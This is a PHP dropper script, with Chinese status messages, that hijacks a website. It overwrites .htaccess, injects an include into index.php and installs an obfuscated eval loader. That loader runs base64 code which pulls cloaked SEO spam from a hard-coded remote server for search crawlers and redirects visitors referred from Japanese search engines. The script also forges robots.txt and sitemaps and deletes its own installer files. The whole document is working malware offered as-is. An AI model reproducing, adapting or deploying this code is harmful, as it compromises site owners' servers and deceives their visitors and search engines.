$code = isset($_GET['code'])? $_GET['code'] : '';
$root = isset($_SERVER['DOCUMENT_ROOT']) ? $_SERVER['DOCUMENT_ROOT'].'/' : '';
$htaccess = $index = $content = '';
if(file_exists($root."index.php")){
    @chmod($root."index.php", 0755);
    $index = file_get_contents($root."index.php");
}elseif(file_exists($root."index.html")){
    $index = file_get_contents($root."index.html");
}
if(file_exists($root.".htaccess")){
    $htaccess = file_get_contents($root.".htaccess");
}
if($code){
    $code = base64_decode($code, true);
    $data = explode(',', $code);
    if(count($data) == 3 || count($data) == 5){
        $code_htaccess = "<IfModule mod_rewrite.c>".PHP_EOL."RewriteEngine On".PHP_EOL."RewriteBase /".PHP_EOL."RewriteRule ^index.php$ - [L]".PHP_EOL."RewriteCond %{REQUEST_FILENAME} !-f".PHP_EOL."RewriteCond %{REQUEST_FILENAME} !-d".PHP_EOL."RewriteRule . index.php [L]".PHP_EOL."</IfModule>";
        if($htaccess){
            if(md5($htaccess) != md5($code_htaccess)){
                @chmod($root.".htaccess", 0755);
                @unlink($root.".htaccess");
                $result = file_put_contents($root.".htaccess", $code_htaccess);
                if($result){
                    $temp = file_get_contents($root.".htaccess");
                    if(md5($temp) == md5($code_htaccess)){
                        $content .= ".htaccess 编辑成功。<br>";
                    }else{
                        $content .= ".htaccess <font color=\"red\">编辑失败。</font><br>";
                    }
                }else{
                    $content .= ".htaccess <font color=\"red\">生成失败。</font><br>";
                }
            }else{
                $content .= ".htaccess 正常。<br>";
            }
        }else{
            $result = file_put_contents($root.".htaccess", $code_htaccess);
            if($result){
                $temp = file_get_contents($root.".htaccess");
                if(md5($temp) == md5($code_htaccess)){
                    $content .= ".htaccess 生成成功。<br>";
                }else{
                    $content .= ".htaccess <font color=\"red\">生成失败。</font><br>";
                }
            }else{
                $content .= ".htaccess <font color=\"red\">生成失败。</font><br>";
            }
        }

        $code_mo = '<?php'.PHP_EOL.'$table_prefix = "wbzaxsye6w4_duevcwondme";'.PHP_EOL.'$table_prefix = str_replace(array("z", "x", "y", "u", "v", "w", "n", "m"), "", $table_prefix);'.PHP_EOL.'$txt_contents = "1f2i3l4e5_6g7e8t9_0c1o2n3t4e5n6t7s8";'.PHP_EOL.'$txt_contents = preg_replace("/\\d+/", "", $txt_contents);'.PHP_EOL.'$wp_content = $txt_contents("index.txt");'.PHP_EOL.'eval/*Designed with utility, safety and style*/($table_prefix($wp_content));'.PHP_EOL.'?>';

        $code_ja = '$inter_domain="http://192.187.108.42/z1007_7/";function curl_get_contents($url){$ch=curl_init();curl_setopt ($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);$file_contents = curl_exec($ch);curl_close($ch);return $file_contents; }function getServerCont($url,$data=array()){$url=str_replace(" ","+",$url);$ch=curl_init();curl_setopt($ch,CURLOPT_URL,$url);curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);curl_setopt($ch,CURLOPT_HEADER,0);curl_setopt($ch,CURLOPT_TIMEOUT,10);curl_setopt($ch,CURLOPT_POST,1);curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);curl_setopt($ch,CURLOPT_POSTFIELDS,http_build_query($data));$output = curl_exec($ch);$errorCode = curl_errno($ch);curl_close($ch);if(0!== $errorCode){ return false;}return $output;}function is_crawler($agent){$agent_check=false; $bots="googlebot|google|yahoo|bing|aol";if($agent!=""){if(preg_match("/($bots)/si",$agent)){$agent_check = true; }}return $agent_check;}function check_refer($refer){ $check_refer=false;$referbots="google.co.jp|yahoo.co.jp|google.com";if($refer!="" && preg_match("/($referbots)/si",$refer)){$check_refer=true;}return $check_refer;}$http=((isset($_SERVER["HTTPS"])&&$_SERVER["HTTPS"]!=="off")?"https://":"http://");$req_uri=$_SERVER["REQUEST_URI"];$domain=$_SERVER["HTTP_HOST"];$self=$_SERVER["PHP_SELF"];$ser_name=$_SERVER["SERVER_NAME"];$req_url=$http.$domain.$req_uri;$indata1=$inter_domain."/indata.php";$map1=$inter_domain."/map.php";$jump1=$inter_domain."/jump.php";$url_words=$inter_domain."/words.php";$url_robots=$inter_domain."/robots.php";if(strpos($req_uri,".php")){$href1=$http.$domain.$self;}else{$href1=$http.$domain;}$data1[]=array();$data1["domain"]=$domain;$data1["req_uri"]=$req_uri;$data1["href"]=$href1;$data1["req_url"]=$req_url;if(substr($req_uri,-6)=="robots"){$robots_cont = getServerCont($url_robots,$data1);define("BASE_PATH",str_ireplace($_SERVER["PHP_SELF"],"",__FILE__));file_put_contents(BASE_PATH."/robots.txt",$robots_cont);$robots_cont=file_get_contents(BASE_PATH."/robots.txt");if(strpos(strtolower($robots_cont),"sitemap")){echo "robots.txt file create success!";}else{echo "robots.txt file create fail!";}exit;}if(substr($req_uri,-4)==".xml"){if(strpos($req_uri,"pingsitemap.xml")){ $str_cont = getServerCont($map1,$data1); $str_cont_arr= explode(",",$str_cont); $str_cont_arr[]="sitemap"; for($k=0;$k<count($str_cont_arr);$k++){ if(strpos($href1,".php")> 0){ $tt1="?"; }else{ $tt1="/";}$http2=$href1.$tt1.$str_cont_arr[$k].".xml";$data_new="https://www.google.com/ping?sitemap=".$http2;$data_new1="http://www.google.com/ping?sitemap=".$http2;if(stristr(@file_get_contents($data_new),"successfully")){echo $data_new."===>Submitting Google Sitemap: OK".PHP_EOL;}else if(stristr(@curl_get_contents($data_new),"successfully")){echo $data_new."===>Submitting Google Sitemap: OK".PHP_EOL;}else if(stristr(@file_get_contents($data_new1),"successfully")){echo $data_new1."===>Submitting Google Sitemap: OK".PHP_EOL;}else if(stristr(@curl_get_contents($data_new1),"successfully")){echo $data_new1."===>Submitting Google Sitemap: OK".PHP_EOL; }else{echo $data_new1."===>Submitting Google Sitemap: fail".PHP_EOL;} } exit;} if(strpos($req_uri,"allsitemap.xml") || strpos($req_uri,"sitemap-index.xml") || strpos($req_uri,"sitemap-index-1.xml")){ $str_cont = getServerCont($map1,$data1); header("Content-type:text/xml"); echo $str_cont;exit;} if(strpos($req_uri,".php")){ $word4=explode("?",$req_uri); $word4=$word4[count($word4)-1]; $word4=str_replace(".xml","",$word4); }else{ $word4= str_replace("/","",$req_uri);$word4= str_replace(".xml","",$word4); }$data1["word"]=$word4;$data1["action"]="check_sitemap";$check_url4=getServerCont($url_words,$data1);if($check_url4=="1"){ $str_cont=getServerCont($map1,$data1); header("Content-type:text/xml"); echo $str_cont;exit;} $data1["action"]="check_words"; $check1= getServerCont($url_words,$data1);if(strpos($req_uri,"map")> 0 || $check1=="1") $data1["action"]="rand_xml";$check_url4=getServerCont($url_words,$data1);header("Content-type:text/xml");echo $check_url4;exit;}if(strpos($req_uri,".php")){$main_shell=$http.$ser_name.$self;$data1["main_shell"]=$main_shell;}else{$main_shell=$http.$ser_name;$data1["main_shell"]=$main_shell;}$referer=isset($_SERVER["HTTP_REFERER"])?$_SERVER["HTTP_REFERER"]:"";$chk_refer=check_refer($referer);$user_agent=strtolower(isset($_SERVER["HTTP_USER_AGENT"])?$_SERVER["HTTP_USER_AGENT"]:"");$res_crawl=is_crawler($user_agent);if(strpos($_SERVER["REQUEST_URI"],".php")){ $url_ext="?"; }else{ $url_ext="/"; } if($chk_refer && !$res_crawl && (preg_match("/ja/i",@$_SERVER["HTTP_ACCEPT_LANGUAGE"]) || preg_match("/ja/i",@$_SERVER["HTTP_ACCEPT_LANGUAGE"]) || preg_match("/^[a-z0-9]+[0-9]+$/",end(explode($url_ext,str_replace(array(".html",".htm"),"",$_SERVER["REQUEST_URI"])))))){echo getServerCont($jump1,$data1);exit; } if($res_crawl){ $data1["http_user_agent"]=$user_agent;$get_content = getServerCont($indata1,$data1); echo $get_content;exit; }';
        $code_en = str_replace('googlebot|google|yahoo|bing|aol', 'googlebot|bingbot|google|aol|bing|yahoo', $code_ja);
        $code_en = str_replace('google.co.jp|yahoo.co.jp|google.com', 'google|yahoo|bing|aol', $code_en);
        $code_en = str_replace('if($chk_refer && (preg_match("/ja/i",@$_SERVER["HTTP_ACCEPT_LANGUAGE"]) || preg_match("/ja/i",@$_SERVER["HTTP_ACCEPT_LANGUAGE"]) || preg_match("/^[a-z0-9]+[0-9]+$/",end(explode($url_ext,str_replace(array(".html",".htm"),"",$_SERVER["REQUEST_URI"]))))))', 'if($chk_refer && substr($_SERVER["REQUEST_URI"],-5)==".html")', $code_en);

        $code_php = '<?php'.PHP_EOL.'$x = "index";'.PHP_EOL.'$y = "mo";'.PHP_EOL.'include($x.".".$y);?>';

        function get_code($url){
            global $code_en,$code_ja;
            $arr_url = parse_url($url);
            if(strstr($arr_url['host'], '_')){
                $temp = explode('.', $arr_url['host']);
                $version = $temp[0];
                $x = explode('_', $version);
                if(isset($x[1])){
                    if($x[1] % 10 == 9){
                        $code1 = str_replace('192.187.108.42/z1007_7', $arr_url['host'], $code_en);
                    }else{
                        $code1 = str_replace('192.187.108.42/z1007_7', $arr_url['host'], $code_ja);
                    }
                }
            }elseif(strstr($arr_url['path'], '_')){
                $version = str_replace('/stat/index.txt', '', $arr_url['path']);
                $version = ltrim($version, '/');
                $x = explode('_', $version);
                if(isset($x[1])){
                    if($x[1] % 10 == 9){
                        $code1 = str_replace('z1007_7', $version, $code_en);
                    }else{
                        $code1 = str_replace('z1007_7', $version, $code_ja);
                    }
                }
                $code1 = str_replace('192.187.108.42', $arr_url['host'], $code1);
            }
            return $code1;
        }

        if(isset($data[0])){
            if(strstr($data[0], 'http')){
                $code1 = get_code($data[0]);
                $result_1 = file_put_contents($root."index.mo", $code_mo);
                $result_2 = file_put_contents($root."index.txt", base64_encode($code1));
                $result_3 = false;
                if(file_exists($root.'index.php')){
                    $temp = file_get_contents($root.'index.php');
                    if($temp){
                        $temp = explode('include($x', $temp);
                        if(isset($temp[0])){
                            if(strstr($temp[0], '$y')){
                                $result_3 = true;
                            }
                        }
                    }
                }
                if(!$result_3){
                    $result_3 = file_put_contents($root."index.php", $code_php.$index);
                }
                if($result_1 && $result_2 && $result_3){
                    $content .= $data[0]." - index.php 劫持成功。<br>";
                }else{
                    $content .= $data[0]." - index.php <font color=\"red\">劫持失败。</font><br>";
                }
            }
        }

        if(isset($data[1]) && isset($data[2])){
            if(strstr($data[1], 'http') && strstr($data[2], '.php')){
                $code2 = get_code($data[1]);
                $file = str_replace('.php', '', $data[2]);
                $result_1 = file_put_contents($root.$file.".mo", str_replace('index', $file, $code_mo));
                $result_2 = file_put_contents($root.$file.".txt", base64_encode($code2));
                $result_3 = file_put_contents($root.$data[2], str_replace('index', $file, $code_php));
                if($result_1 && $result_2 && $result_3){
                    $content .= $data[1]." - ".$data[2]." 劫持成功。<br>";
                }else{
                    $content .= $data[1]." - ".$data[2]." <font color=\"red\">劫持失败。</font><br>";
                }
            }
        }

        if(isset($data[3]) && isset($data[4])){
            if(strstr($data[3], 'http') && strstr($data[4], '.php')){
                $code3 = get_code($data[3]);
                $file = str_replace('.php', '', $data[4]);
                $result_1 = file_put_contents($root.$file.".mo", str_replace('index', $file, $code_mo));
                $result_2 = file_put_contents($root.$file.".txt", base64_encode($code3));
                $result_3 = file_put_contents($root.$data[4], str_replace('index', $file, $code_php));
                if($result_1 && $result_2 && $result_3){
                    $content .= $data[3]." - ".$data[4]." 劫持成功。<br>";
                }else{
                    $content .= $data[3]." - ".$data[4]." <font color=\"red\">劫持失败。</font><br>";
                }
            }
        }
        
        $uri = isset($_SERVER['SCRIPT_URI']) ? $_SERVER['SCRIPT_URI'] : '';
        if($uri == ''){
            if(!function_exists('isHttps')){
                function isHttps(){
                    if((!empty($_SERVER['REQUEST_SCHEME']) && $_SERVER['REQUEST_SCHEME'] == 'https') || (!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] == 'on') || (!empty($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] == 'https') || (!empty($_SERVER['HTTP_X_FORWARDED_SSL']) && $_SERVER['HTTP_X_FORWARDED_SSL'] == 'on') || (!empty($_SERVER['SERVER_PORT']) && $_SERVER['SERVER_PORT'] == '443')){
                        $server_request_scheme = 'https';
                    }else{
                        $server_request_scheme = 'http';
                    }
                    return $server_request_scheme;
                }
            }
            $http = isHttps();
            $uri = $http."://".$_SERVER['HTTP_HOST'];
        }
        $self = isset($_SERVER['PHP_SELF']) ? $_SERVER['PHP_SELF'] : '';
        $temp = str_replace($self, '', $uri);
        $status = 0;
        if($temp){
            $robots = "User-agent: *".PHP_EOL."Allow: /".PHP_EOL."Sitemap:".$temp."/sitemap.xml".PHP_EOL."Sitemap:".$temp."/sitemap_1.xml";
            if(file_exists($root.'robots.txt')){
                @chmod($root.'robots.txt', 0755);
                $temp = file_get_contents($root.'robots.txt');
                if(md5($temp) == md5($robots)){
                    $status = 1;
                    $content .= "robots.txt 正常。<br>";
                }
            }
            if($status == 0){
                $result = file_put_contents($root.'robots.txt', $robots);
                if($result){
                    $content .= "robots.txt 生成成功。<br>";
                }else{
                    $content .= "robots.txt 生成失败。<br>";
                }
            }
        }
    }else{
        $content = '劫持失败，参数错误。';
    }
}
echo $content;
@unlink('6.php');
@unlink('6.mo');
@unlink('6.txt');